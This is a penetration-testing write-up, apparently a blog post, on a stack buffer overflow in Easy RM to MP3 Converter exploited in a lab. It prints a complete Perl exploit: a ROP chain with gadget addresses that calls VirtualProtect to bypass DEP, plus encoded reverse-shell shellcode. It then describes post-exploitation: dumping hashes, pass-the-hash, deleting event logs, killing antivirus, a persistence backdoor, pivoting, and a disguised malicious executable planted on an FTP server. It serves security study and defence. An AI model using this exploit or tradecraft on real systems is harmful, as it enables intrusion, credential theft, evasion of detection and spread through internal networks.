Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit

http://dikien2012.blogspot.com

1

Penetration Testing for Easy RM to MP3

Converter Application & Post Exploit

Author:

JongWon Kim

[email protected]


2

Table of Contents

Penetration Testing for Easy RM to MP3 Converter Application.............................................................1

Table of Contents……….........................................................................................................................2

Abstract..................................................................................................................................................3

Setting up the Testing Enviroment.........................................................................................................4

Strategy for the Application Testing........................................................................................................5

Dynamic Analysis...................................................................................................................................6

Strategy for the Post Exploit.................................................................................................................15

Post Exploit...........................................................................................................................................16

Conclusion............................................................................................................................................21


3

Abstract

Advanced Persistent Attack nowadays has threatened our valuable assets. Many exploits that

threaten end point users and corporation have been researched day by day. No matter how operation

system protection methods works well, privilege escalation could be easy just because a vulnerable

application. Many corporations defends their information by setting firewall, WAF, and SLB, but only

one vulnerable application could make these powerful protection line incapacitated. In this paper, I will

analysis this application and suggest the solution within windows environment.

This is imaginary scenario for this paper. My client requests me sometimes „Easy RM to MP3

Converter ‟exits when opening a m3u file that contains an overly long strings. First, I figure out this

application has a vulnerability with stack based buffer overflow. I build the ROP based exploit to test.

Second, I will attack the machine running the application with the exploitation and do post exploit.


4

Setting up the Testing Environment

Backtrack5 R1(Attack Machine, 192.168.10.10)

Windows SP2 (First Victim for the application penetration testing, 192.168.10.5, 10.10.10.5)

Windows SP3(Second Victim for pivot, 10.10.10.20)

Immunity Debugger 1.83

Easy RM to MP3 Converter(2.7.3.700, Vulnerable Application)

Metasploit Framework

Social Engineering Toolkit

ALFTP 5.22

Testing Environment Explanation :

The default DEP, Data Execute Protection, setting for Windows SP2 is OptIn(All programs, process,

services on the windows system are protected, except for processes in the exception list). Before

taking a penetration testing, I manually have changed it to OptOut by adding „/noexecute=policy‟ to

the end of the line that refers to the OS boot configuration. OptOut option is that all programs,

processes, services on the Windows system are protected, except for processes in the exception list.

There is no the exception list for this testing.


5

Strategy for the Application Testing

I use one of the windows function calls named VirtualProtect() to bypass DEP. This function change

the access protection level of a given memory page, allowing to make the location where my payload

resides executable. I have to set up the stack with the correct parameters for that function first. I can‟t

overwrite return address directly to my payload or use SEH chains because the payload will not get

executed on stack since DEP is OptOut.

Below is the prototype of VirtualProtect() :

BOOL WINAPI VirtualProtect( __in LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flNewProtect, __out PDWORD lpflOldProtect );

Return address: VirtualProtect () will return to the pointer to the location where the address of

the payload on the stack

lpAddress: A pointer an address that describes the starting page of the region of pages

whose access protection attributes are to be changed.

dwSize: The size of the region whose access protection attributes are to be changed, in

bytes.

flNewProtect: Option that specifies the new protection

0x00000040 PAGE_EXECUTE_READWRITE

lpflOldProtect : Pointer to variable that will receive the previous access protection value.


6

Dynamic Analysis

At first, I calculate the offset between registers and the buffer with the perl script to make a vulnerable

m3u file and run the application attached debugger with the m3u file. Below is source code to make

an m3u file.

==================================================================

my $file= "exploit.m3u";

my $junk= "\x41" x 26058;

$junk = $junk . "XXXX";

my $eip = "BBBB"; # This will overwrite the EIP.

my $nops = "\x90"x240;

my $shellcode =””;

my $rest = "C"x300;

my $payload = $junk.$eip.$nops.$shellcode.$rest;

print "Payload size : ".length($payload)."n";

print "Shellcod size : ".length($shellcde)."n";

open($FILE,">$file");

print $FILE "$payload";

close($FILE);

print "m3u File Created successfully\n";

==================================================================

[ Figure 1. EIP is overwritten with BBBB ]


7

42424242 is hexadecimal representation for BBBB. There is another method to find offset with

mona.py by command line below debugger „!mona pattern_create 3000‟. I add this unique pattern to

the script.

==================================================================


my $junk= "\x41" x 26000;

my $pattern =””; # msf unique pattern is here

my $nops = "\x90"x240;

my $shellcode = "";

my $rest = "C"x300;

my $payload = $junk.$pattern.$nops.$shellcode.$rest;





close($FILE);


==================================================================

After crashing, I get more useful information by command „!mona suggest‟. On top of that, I check if

the payload is corrupt or not by command „!mona compare -f “C:\Documents and

Settings\Administrator\바탕 화면\RM2MP3Converter\pattern.txt‟. I create gatgets to make a ROP

chains by command „!mona rop -n -cm aslr=false,safeseh=false,rebase=false‟. After making the ROP

chains, EIP will point the shellcode that I want to get executed. I made the shellcode with msfpayload

and msfencode and added the script to make a final exploit m3u file.

[ Figure 2. Making a Payload to connect back to attacker machine ]

My final exploit is below.

Stage-1 : Saving stack pointer to EAX and EDI registers and jumping over the parameters

Stage-2 : Crafting parameters lead to setting up the arguments of a function that would allow me to

disable DEP or bypass it.


8

==================================================================


my $junk= "\x41" x 26064;

my $eip = pack('V',0x7C84483D); # RETN from kernel32.dll

my $junk2 = "AAAA"; # Compensate for

########### Stage-1 Started here ###########

########### Put stack pointer in EDI & EAX ###########

my $rop = pack('V',0x5a489ee7); # PUSH ESP//MOV EAX,EDX//POP EDI//RETN from uxtheme.dll

$rop = $rop.pack('V',0x77bce842); # PUSH EDI//POP EAX//POP EBP//RETN from msvcrt.dll

$rop = $rop."AAAA"; # Compensate for

$rop = $rop.pack('V',0x1001653D); # ADD ESP,20//RETN from MSRMfilter03.dll

########### Parameters fpr VirtualProtect() ###########

my $parameters =pack('V',0x7C801AD0); # Address for VirtualProtect ()

$parameters = $parameters."WWWW"; # Return address

$parameters = $parameters."XXXX"; # lpaddress

$parameters = $parameters."YYYY"; # Size

$parameters = $parameters."ZZZZ"; # flNewProtect

$parameters = $parameters.pack('V',0x10035005); # Writeable address

$parameters = $parameters.("H" x 8); # Padding

########### Stage-1 finished ###########

########### Stage-2 starts is below ###########

########### First Parameter ############

my $rop2 = pack('V',0x77427175); # XCHG EDI,ESI//RETN 8


9

########### Make EAX point at the shellcode ###########

$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP from MSRMfilter03.dll

$rop2 = $rop2."AAAA"; # Padding - Compensate for RETN 8

$rop2 = $rop2."AAAA";

$rop2 = $rop2."AAAA";

########### Second Parameter, RETN is in EAX ############

$rop2 = $rop2.pack('V',0x77D944C4);

# MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN

$rop2 = $rop2."AAAA"; #Padding

########## EAX now contains Stack Pointer #############

$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN

########## Make EAX point at Shellcode again ###########

$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN

$rop2 = $rop2."AAAA"; #Padding

########## Increase ESI with 4 #############

$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32

$rop2 = $rop2.pack('V',0x5C83F948);



########## Write lpADDress ############

$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI

$rop2 = $rop2."AAAA"; # Padding


10

########## Save EAX in ESI again ##########

$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX POP ESI RETN

########## Create Size Set EAX to 300 or so ##########

$rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN

$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN


$rop2 = $rop2.pack('V',0x1002DC4C); #ADD EAX,100//POP EBP//RETN


$rop2 = $rop2.pack('V',0x1002DC4C); #ADD EAX,100//POP EBP//RETN


########## Write Size, First Set ESI to Right Place ##########





########## 3th Parameter ##########

$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI


########## Save EAX in ESI again ##########

$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN

########## flNewProject 0x40 ##########

$rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN

$rop2 = $rop2.pack('V',0x1002DC41); # ADD EAX,40//POP EBP//RETN


11






########## 4th Parameter ##########

$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//RETN


########## Return to virtual protect pointer, Compensate for 2 POPs instruction ##########

$rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//ret

$rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//ret

########## Change ESP & Back to the origin ##########

$rop2 = $rop2.pack('V',0x73D35CA8);

# PUSH EAX//POP ESP//MOV EAX,EDI//POP EDI//POP ESI//RETN from MFC32.dll

my $nops = "\x90"x240;

$shellcode = "\x89\xe0\xd9\xf6\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .

"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .

"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .

"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .

"\x75\x4a\x49\x49\x6c\x49\x78\x6b\x39\x43\x30\x75\x50\x53" .

"\x30\x73\x50\x4e\x69\x4d\x35\x44\x71\x6e\x32\x62\x44\x6c" .

"\x4b\x62\x72\x30\x30\x4c\x4b\x46\x32\x56\x6c\x6e\x6b\x30" .

"\x52\x75\x44\x6e\x6b\x61\x62\x56\x48\x74\x4f\x4d\x67\x42" .

"\x6a\x65\x76\x30\x31\x49\x6f\x66\x51\x79\x50\x6c\x6c\x75" .


12

"\x6c\x45\x31\x53\x4c\x35\x52\x56\x4c\x71\x30\x59\x51\x48" .

"\x4f\x54\x4d\x37\x71\x7a\x67\x6d\x32\x5a\x50\x76\x32\x66" .

"\x37\x4e\x6b\x56\x32\x44\x50\x6e\x6b\x37\x32\x37\x4c\x55" .

"\x51\x5a\x70\x4c\x4b\x63\x70\x30\x78\x6f\x75\x39\x50\x32" .

"\x54\x62\x6a\x47\x71\x48\x50\x30\x50\x6e\x6b\x73\x78\x55" .

"\x48\x4e\x6b\x46\x38\x57\x50\x55\x51\x6e\x33\x59\x73\x47" .

"\x4c\x42\x69\x4e\x6b\x75\x64\x4c\x4b\x33\x31\x4b\x66\x55" .

"\x61\x4b\x4f\x55\x61\x79\x50\x4e\x4c\x59\x51\x7a\x6f\x54" .

"\x4d\x55\x51\x6a\x67\x66\x58\x49\x70\x30\x75\x58\x74\x65" .

"\x53\x31\x6d\x5a\x58\x37\x4b\x63\x4d\x46\x44\x73\x45\x39" .

"\x72\x31\x48\x4e\x6b\x76\x38\x77\x54\x65\x51\x59\x43\x42" .

"\x46\x4e\x6b\x56\x6c\x50\x4b\x4e\x6b\x31\x48\x45\x4c\x43" .

"\x31\x79\x43\x6c\x4b\x45\x54\x4e\x6b\x77\x71\x4e\x30\x4c" .

"\x49\x43\x74\x54\x64\x65\x74\x61\x4b\x71\x4b\x73\x51\x70" .

"\x59\x52\x7a\x66\x31\x69\x6f\x49\x70\x62\x78\x33\x6f\x61" .

"\x4a\x6c\x4b\x45\x42\x4a\x4b\x4b\x36\x61\x4d\x71\x78\x76" .

"\x53\x54\x72\x45\x50\x57\x70\x75\x38\x52\x57\x33\x43\x66" .

"\x52\x73\x6f\x63\x64\x42\x48\x30\x4c\x52\x57\x66\x46\x57" .

"\x77\x4b\x4f\x78\x55\x4c\x78\x4e\x70\x65\x51\x75\x50\x67" .

"\x70\x71\x39\x38\x44\x71\x44\x70\x50\x70\x68\x51\x39\x6b" .

"\x30\x50\x6b\x77\x70\x59\x6f\x38\x55\x42\x70\x52\x70\x46" .

"\x30\x62\x70\x67\x30\x66\x30\x61\x50\x70\x50\x42\x48\x7a" .

"\x4a\x44\x4f\x79\x4f\x39\x70\x4b\x4f\x58\x55\x4a\x37\x43" .

"\x5a\x67\x75\x65\x38\x69\x50\x4d\x78\x35\x5a\x37\x7a\x35" .

"\x38\x35\x52\x33\x30\x56\x71\x51\x4c\x4d\x59\x38\x66\x51" .

"\x7a\x54\x50\x62\x76\x66\x37\x35\x38\x4e\x79\x49\x35\x74" .

"\x34\x71\x71\x69\x6f\x6a\x75\x4f\x75\x6b\x70\x42\x54\x56" .

"\x6c\x49\x6f\x62\x6e\x74\x48\x63\x45\x7a\x4c\x32\x48\x6c" .

"\x30\x6f\x45\x4e\x42\x63\x66\x49\x6f\x68\x55\x61\x7a\x47" .


13

"\x70\x61\x7a\x34\x44\x50\x56\x36\x37\x75\x38\x63\x32\x4b" .

"\x69\x69\x58\x73\x6f\x49\x6f\x39\x45\x4e\x6b\x57\x46\x31" .

"\x7a\x47\x30\x33\x58\x55\x50\x44\x50\x47\x70\x73\x30\x32" .

"\x76\x62\x4a\x65\x50\x32\x48\x66\x38\x69\x34\x61\x43\x59" .

"\x75\x69\x6f\x68\x55\x5a\x33\x56\x33\x61\x7a\x55\x50\x61" .

"\x46\x32\x73\x50\x57\x30\x68\x66\x62\x68\x59\x48\x48\x53" .

"\x6f\x6b\x4f\x39\x45\x47\x71\x48\x43\x57\x59\x58\x46\x4e" .

"\x65\x4c\x36\x30\x75\x68\x6c\x6f\x33\x41\x41";

my $rest = "C"x300;

my $payload = $junk.$eip.$junk2.$rop.$parameters.$rop2.$nops.$shellcode.$rest;





close($FILE);


==================================================================

Since the shellcode is turning back to the backtrack machine, I use multi handler on msfconosole to

listen on 4444 tcp port.

[ Figure 3. Listening on 4444 tcp port ]


14

I create the m3u file with above script and open it with the application.

[ Figure 4. Open the exploit.m3u to crach the application ]

I get the meterpreter shell from first victim machine..

[ Figure 5. Get the Meterpreter shell from the first Victim Machine ]


15

Strategy for the Post Exploit

1. Understanding the Victim better

2. Privilege Escalation

3. Deleting Logs and Killing Monitoring software

4. Collecting Data, and Executing programs

5. Backdoors and Rootkits

6. Using victims as a Pivot to hack deeper into the network


16

Post Exploit

1. Understaning the Victim better

[ Figure 5. Network Information ]

I figure out password hashes and can crack it with JohnTheRipper. If I cannot figure out what the

original passwords, I can use the pass-the-hash technique, which requires that we have only the

password hash, not the password itself.

[ Figure 6. Password Hashes ]

I can look for more vulnerable applications, available tokens, and routing table.

[ Figure 7. Token Lists ]


17

[ Figure 8. Running applications ]

[ Figure 9. Routing Table ]

I notice this machine is running on ALFTP, it will be used on social engineering attack.

[ Figure 10. ALFTP is running ]

2. Privilege Escalation

After getting the system, I safely migrate 1072(svchost.exe) via technique 1.

[ Figure 11. Privilege Escalation Success ]


18

3. Deleting Logs and Killing Monitoring software

I try to kill anti virus software, but there is no it and get rid of event logs.

[ Figure 12. Killing AV and deleting event logs ]

4. Collecting Data, and Executing programs

[ Figure 13. Collecting txt files ]

5. Backdoors and Rootkits

I run persistence and tell Windows to auto start the agent at boot time, wait 100 seconds before

connection retries to run on port 443 and connect to IP 192.168.10.5.

[ Figure 14. Installing the Backdoor ]


19

6. Using victims as a Pivot to hack deeper into the network

I found the first victim machine has two network cards of different subnets, which will be inner network

disconnected from outside. I go inside using first victim machine working tunnel.

[ Figure 15. Setting routing table ]

[ Figure 16. Running scan via session 1 ]

I am aware the second victim machine (10.10.10.20) has open port for 139, which means it could

have vulnerability for „MS08-067‟.

[ Figure 17. Port Scan ]

I make a malicious file with fake name (alsong.exe) that works for connecting back to attacker

machine with meterpreter shell. I find the working directory for FTP Server on first victim machine and

upload it.

[ Figure 18. Uploading the malicious file ]


20

Check it out malicious file is on the FTP Server. Second victim download and execute it.

[ Figure 19. Uploading the malicious file ]

New session is created by second victim machine.

[ Figure 20. Attak Success on second Victim machine ]


21

Conclusion

I showed vulnerable application could threaten the inner intranet. It is not always latest OS protection

mechanism, Firewall, and SLB can protect our assets. It is vital that not only developers should

ensure their secure coding from preventing from such as buffer over flow or heap spray attack, but

also end point users should be aware security consciousness whose they don‟t have to use

applications they don‟t use for work and always updated to the latest condition. It is obvious that

essential database should be away from normal staffs completely. As is frequently pointed out, we

should keep in mind attack could happen inside.

Date post:	25-Dec-2014
Category:	Documents
Upload:	jongwon-kim
View:	1,098 times
Download:	1 times